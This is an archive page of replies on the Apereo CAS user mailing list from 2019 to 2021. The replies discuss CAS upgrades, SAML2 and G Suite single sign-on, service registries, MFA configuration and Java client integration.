Maybe? That version was released nearly 7 years ago and isn't supported. I would suggest moving to CAS 6.3. On Thu, 2021-01-21 at 17:05 -0800, Kylie L wrote: Will CAS 3.5.2 work with an Oracle 19c or 18c database? Thanks -- - Website: https://apereo.github.io/cas - Gitter Chatroom:

Re: [cas-user] Getting 403 when POST to /cas endpoint

2021-01-22 Thread 'Richard Frovarp' via CAS Community
So you want to turn CAS into a SAML 2 SP? You'll need to follow this documentation: https://apereo.github.io/cas/5.3.x/integration/Delegate-Authentication.html On Thu, 2021-01-21 at 17:09 -0800, Yan Zhou wrote: > Hi, > > Try to implement this: people logged into their app (that does not > use

Re: [cas-user] Getting 403 when POST to /cas endpoint

2021-01-21 Thread 'Richard Frovarp' via CAS Community
Why are you trying to POST to the login URL? It looks like this isn't the POST from the login page? What do the CAS logs say? On Thu, 2021-01-21 at 15:27 -0800, Yan Zhou wrote: > Hello, > > i am using CAS 5.3.X, but I think the same would apply to CAS4 or > CA5. > >

Re: [cas-user] Managing Services with JPA (SQL)

2020-12-04 Thread 'Richard Frovarp' via CAS Community
I believe that it is serialized Java classes. So it's binary data. You don't change it without an external service. I guess you could find the code that does it and write your own service. But you won't be doing it via direct DB manipulation. On Fri, 2020-12-04 at 09:48 +, Francisco

Re: [cas-user] cas Java installation

2020-12-03 Thread 'Richard Frovarp' via CAS Community
You would normally use it with your favorite security library in Java. Common ones include Apache Shiro, Pac4J, and Spring Security. From there use the library specific instructions for bringing in the CAS client library. On Thu, 2020-12-03 at 13:23 +0530, rohini bansode wrote: > IF you have some

Re: [cas-user] Wrong user authenticated

2020-10-08 Thread 'Richard Frovarp' via CAS Community
Probably not? That sounds like code that is being hit somewhere that isn't thread safe. The built in LDAP code to CAS should be just fine with that respect. Assuming you're using a well supported LDAP server that wouldn't have thread issues? I don't know how a HTTP proxy would impact this. I

Re: [cas-user] Configure SAML2 IdP functionality to provide SSO for G Suite

2020-09-23 Thread 'Richard Frovarp' via CAS Community
The cert you were using under the old integration likely doesn't match your SAML cert. You would need to upload your new SAML cert to Google. And yeah, you want to remove the old bits of the old method, in particular the jars associated with it as it fires before the generic SAML can. On Tue,

Re: [cas-user] Google SSO

2020-09-08 Thread 'Richard Frovarp' via CAS Community
without typos, I was able to successfully logout from both CAS and Google mail. -Jeremiah Garmatter, Systems Administrator -Ohio Northern University, Class of 2020 -Work: 419-772-1074 Cell: 419-672-8685 -j-gar...@onu.edu On Mon, Aug 17, 2020 at 11:52 AM Richard Frovarp wrote: I haven

Re: [cas-user] Google SSO

2020-08-17 Thread Richard Frovarp
419-672-8685 -j-gar...@onu.edu On Fri, Aug 14, 2020 at 12:06 PM Richard Frovarp wrote: I think that's controlled by the metadata, and my notes below say 1.1 unspecified. On Fri, 2020-08-14 at 12:03 -0400, Jeremiah Garmatter wrote: Ah, I see now. I should have mentioned that, in our case, the use

Re: [cas-user] CAS Management not starting

2020-08-17 Thread Richard Frovarp
You probably aren't waiting long enough? 2020-08-17 09:06:54,686 DEBUG [org.apache.http.impl.execchain.MainClientExec] - Executing request GET /actuator/discoveryProfile HTTP/1.1 It's trying to make a connection to your CAS system. Looks like from your logs it hasn't time out, and thus hasn't

Re: [cas-user] Google SSO

2020-08-14 Thread Richard Frovarp
On Fri, Aug 14, 2020 at 10:24 AM Richard Frovarp <richard.frov...@ndsu.edu> wrote: Yeah, you'll need to treat it like any other SAML2 service, including using the SamlRegisteredService configuration. Not entirely sure about attribute release. In our case, releasing the default userna

Re: [cas-user] Google SSO

2020-08-14 Thread Richard Frovarp
Yeah, you'll need to treat it like any other SAML2 service, including using the SamlRegisteredService configuration. Not entirely sure about attribute release. In our case, releasing the default username is all we need to make it work. But it should be like any other SAML2 service. The

Re: [cas-user] Google SSO

2020-08-03 Thread Richard Frovarp
No, there isn't. You configure it as a SAML 2 provider. This means you have to craft the metadata by hand. Also, it is beyond deprecated as it will kill your other SAML integrations. So it's best to just do a pure SAML setup with it. Here's the draft set of instructions I put together. I need to

Re: [cas-user] CAS Management UI Question

2020-07-27 Thread Richard Frovarp
https://apereo.github.io/cas-management/5.3.x/installation/Installing-ServicesMgmt-Webapp.html#available-attributes On Mon, 2020-07-20 at 09:14 -0600, Bryan Wooten wrote: How do I

Re: [cas-user] same user with 2 logins and MFA

2020-07-17 Thread Richard Frovarp
https://apereo.github.io/cas/5.1.x/installation/Configuration-Properties.html > ) but is documented absolutely nowhere? > > As you can see, I'm quite lost. I try to do my home work but the lack > of documentation is really a problem. > > regards > > Patrick Proniewski

Re: [cas-user] same user with 2 logins and MFA

2020-07-16 Thread Richard Frovarp
> cas.authn.mfa.globalPrincipalAttributePredicate=file:/etc/cas/mfaGroovyPredicate.groovy > but this file is basically default/useless AFAIK. > As far as I understand, MFA in CAS uses "{user}" as key instead of retrieving and using the value of uid from LDAP. That migh

Re: [cas-user] same user with 2 logins and MFA

2020-07-15 Thread Richard Frovarp
t me know. > > Regards, > > Patrick Proniewski > -- > Head of the Operations Department ~ DSI ~ Université Lyon 2 > Information Systems Security Officer > > > From: cas-user@apereo.org on behalf of Richard > Frovarp >

Re: [cas-user] same user with 2 logins and MFA

2020-07-15 Thread Richard Frovarp
You are going to need to provide more details. How are you triggering MFA? What MFA solution are you using? Etc. Something isn't matching, but not knowing what you are matching on when it works just leaves a bunch of guesses. On Wed, 2020-07-15 at 16:20 +0200, Patrick Proniewski wrote: > Hello, >

Re: [cas-user] JDBC attribute SQL query

2020-07-10 Thread Richard Frovarp
cas.authn.attribute-repository.jdbc[0].case-canonicalization=NONE|LOWER|UPPER It's been a while since we haven't used canonicalization, so I can't remember the details (like CAS 3.4). However, it used to be that CAS would return back the username attribute case matching whatever the user typed

Re: [cas-user] How do you set the ticket generator?

2020-06-08 Thread Richard Frovarp
to have a line about this in the Configuring Ticketing Components area. On Mon, 2020-06-08 at 21:09 +, Richard Frovarp wrote: > I need to add a suffix to the service ticket that is being generated. > I > see in the code that it is in the code, but I have no idea where to > begin to

[cas-user] How do you set the ticket generator?

2020-06-08 Thread Richard Frovarp
I need to add a suffix to the service ticket that is being generated. I see in the code that it is in the code, but I have no idea where to begin to make changes to configuration. I can do it either globally or per service, that doesn't matter. I have some code that is looking at the suffix to

Re: [cas-user] Logging "Application Not Authorized to Use CAS"

2020-05-22 Thread Richard Frovarp
Example entry: 2020-05-22 09:43:51,450 WARN [org.apereo.cas.web.flow.ServiceAuthorizationCheck] - https://frovarp.com] is not found in service registry.> On Fri, 2020-05-22 at 14:16 +0000, Richard Frovarp wrote: > That's logged at the default logging level in cas.log. I don't >

Re: [cas-user] Logging "Application Not Authorized to Use CAS"

2020-05-22 Thread Richard Frovarp
That's logged at the default logging level in cas.log. I don't remember what it shows up as, but it is in there. I've used it to find when services make unexpected changes on me. Richard On Fri, 2020-05-22 at 15:39 +0200, spfma.t...@e.mail.fr wrote: > Hi, > Is there a way to log these errors ? I

Re: [cas-user] Handling multiple accounts for one person

2020-05-18 Thread Richard Frovarp
We just have separate accounts in AD, which is where we are authenticating and doing attribute release from. The IAM system is responsible for correctly populating the directory and end application if needed in the correct way for each account. This requires multiple accounts and passwords, and

Re: [cas-user] cas5 rebuild and restart for every change??

2020-04-09 Thread Richard Frovarp
If you deploy to an external container like Tomcat, you can, instead of using the war, explode it into the webapp directory. Wars and jars are just zip files. Or let Tomcat explode it for you the first time, stop Tomcat, then delete the war. You can edit content without having to rebuild. I think

Re: [cas-user] Registry service from CAS MANAGEMENT WEB APP to MONGODB

2020-03-17 Thread Richard Frovarp
Yeah, there's something odd with the 5.3 version of the manager. Even with the version control bits turned off, it still wants to go to the services-repo directory. Also, with JPA, it doesn't work with the latest server versions of 5.3 for SAML2 services. Not sure if you will see that problem with

Re: [cas-user] How do to G Suite as a normal SAML SP?

2020-03-05 Thread Richard Frovarp
to guess and try multiple times. On 3/5/20 1:51 PM, Ray Bon wrote: Richard, There are some online tools that can get you started, https://www.google.com/search?client=ubuntu=fs=saml2+create+metadata=utf-8=utf-8 Ray On Thu, 2020-03-05 at 19:42 +, Richard Frovarp wrote: I'm missing

[cas-user] How do to G Suite as a normal SAML SP?

2020-03-05 Thread Richard Frovarp
I'm missing something basic in what it is that I need. We have G Suite setup through the custom bit in CAS. That is conflicting with our other normal SAML SPs and throwing stack traces. I see that in 5.3, the version that we are on, the custom bit has been deprecated. What I'm not able to wrap

[cas-user] CAS Management: How to do authorization?

2020-02-06 Thread Richard Frovarp
How does one do authorization checks in CAS Management 5.3.6 using CAS attribute return? In 5.1, I have this: cas.mgmt.adminRoles[0]=CN=,OU=,DC=dc,DC=ndsu,DC=edu cas.mgmt.authzAttributes[0]=memberOf Not entirely sure why that is failing on 5.3.6. Part of me says that it is due to pac4j

Re: [cas-user] Upgrading from 5.1 to 5.3 with JPA service registry and SAML 2 services

2020-02-05 Thread Richard Frovarp
,skipGeneratingSubjectConfirmationInResponseTo=0,skipGeneratingSubjectConfirmationNotBefore=1,skipGeneratingSubjectConfirmationNotOnOrAfter=0,skipGeneratingSubjectConfirmationRecipient=0,skipGeneratingTransientNameId=0 where metadataLocation is not null; On 2/5/20 5:36 PM, Richard Frovarp wrote: > Lo

[cas-user] Upgrading from 5.1 to 5.3 with JPA service registry and SAML 2 services

2020-02-05 Thread Richard Frovarp
Looks like there was a change to how SAML 2 services were defined in CAS 5.2. So when Hibernate brings those back in, it's failing to create the object. My guess is that since there isn't anything there in the serialized form, it is trying to set a boolean to null, which doesn't work well for

Re: [cas-user] CAS, Chrome 80 and SameSite cookies policy

2020-01-30 Thread Richard Frovarp
From what I gather, it's mostly an SP issue. The SSO part might be an issue with the IdP, and the fix for it might kill some versions of Safari. It's best to test with Firefox as it doesn't have a two minute grace period. This is what I've gleaned from the Shibboleth list. Their

Re: [cas-user] Re: Cas java client

2019-12-07 Thread Richard Frovarp
The web.xml file is part of your web application. You need to modify that and include the required jar files. From: cas-user@apereo.org on behalf of KIRTI KHEDKAR Sent: Friday, December 6, 2019 10:09:56 PM To: CAS Community Subject: [cas-user] Re: Cas java

Re: [cas-user] Re: Cas java client

2019-12-06 Thread Richard Frovarp
Documentation can be found https://github.com/apereo/java-cas-client/blob/master/README.md Looks to be some good examples https://cuit.columbia.edu/cas-authentication/java From: cas-user@apereo.org on behalf of KIRTI KHEDKAR Sent: Friday, December 6, 2019

Re: [cas-user] Cas java client

2019-12-06 Thread Richard Frovarp
That will depend on how you plan to use it. You will need to provide more details. Some of the common ways to use it in Java are the servlet filter, Spring Security, and Apache Shiro. From: cas-user@apereo.org on behalf of KIRTI KHEDKAR Sent: Friday, December

Re: [cas-user] CAS - Form Based Login

2019-11-21 Thread Richard Frovarp
Yeah, I think that should work. I've done it once or twice for a web application. You'll have to bring in the CAS Servlet filter to do it. Pretty much everything of mine is using Apache Shiro for security, so I'm not very familiar with the servlet based security constraints.

Re: [cas-user] IAM & SSO

2019-11-20 Thread Richard Frovarp
It depends on what you are after. You can do authentication checks for the whole service using the service access strategy: https://apereo.github.io/cas/6.1.x/services/Configuring-Service-Access-Strategy.html You can also do attribute release in a lot of the authentication protocols that CAS
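The reply above points at the service access strategy as the place to gate an entire service on the user's attributes. As an added example, not taken from the thread or from the CAS documentation, here is a JSON service definition that only admits users whose memberOf attribute contains a given group; the service URL, id and group DN are made up for the example.

```json
{
  "@class": "org.apereo.cas.services.RegexRegisteredService",
  "serviceId": "^https://app\\.example\\.edu/.*",
  "name": "Example App (assumed service)",
  "id": 100,
  "accessStrategy": {
    "@class": "org.apereo.cas.services.DefaultRegisteredServiceAccessStrategy",
    "enabled": true,
    "ssoEnabled": true,
    "requireAllAttributes": true,
    "requiredAttributes": {
      "@class": "java.util.HashMap",
      "memberOf": [
        "java.util.HashSet",
        [ "CN=app-users,OU=Groups,DC=example,DC=edu" ]
      ]
    }
  },
  "attributeReleasePolicy": {
    "@class": "org.apereo.cas.services.ReturnAllowedAttributeReleasePolicy",
    "allowedAttributes": [ "java.util.ArrayList", [ "mail", "memberOf" ] ]
  }
}
```

Note that the check is only as good as the attribute it keys on: the attribute has to actually be resolved for the principal (here memberOf from the directory) before the access strategy evaluates it, and a user whose directory record is missing the attribute is simply denied.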

Re: [cas-user] CAS - Form Based Login

2019-11-20 Thread Richard Frovarp
The point of doing federated authentication is that you don't login through the application anymore. So you no longer need the login form. It becomes a button like all of the login with Facebook, Google, Twitter, etc options you see on a variety of sites. On 11/20/19 3:10 AM, Steve Cheung

Re: [cas-user] How to install CAS 3.3 with Tomcat 8.0

2019-10-28 Thread Richard Frovarp
21:22, Richard Frovarp (mailto:richard.frov...@ndsu.edu) wrote: Tomcat 8 is also EOL. On 10/25/19 1:29 PM, Ray Bon wrote: Carlota, Out of curiosity, why are you bound to an ancient, unsupported, and insecure version of CAS? Maven can be downloaded, https://maven.apache.org/ Ha

Re: [cas-user] How to install CAS 3.3 with Tomcat 8.0

2019-10-25 Thread Richard Frovarp
The 3.4 method was to create a Maven overlay and build a war from there. I think there was a special config file. Don't remember how that was referenced. You'll need to dig into old documentation. You probably can do it without Maven, but it would be a giant pain. Maven is a build tool and in
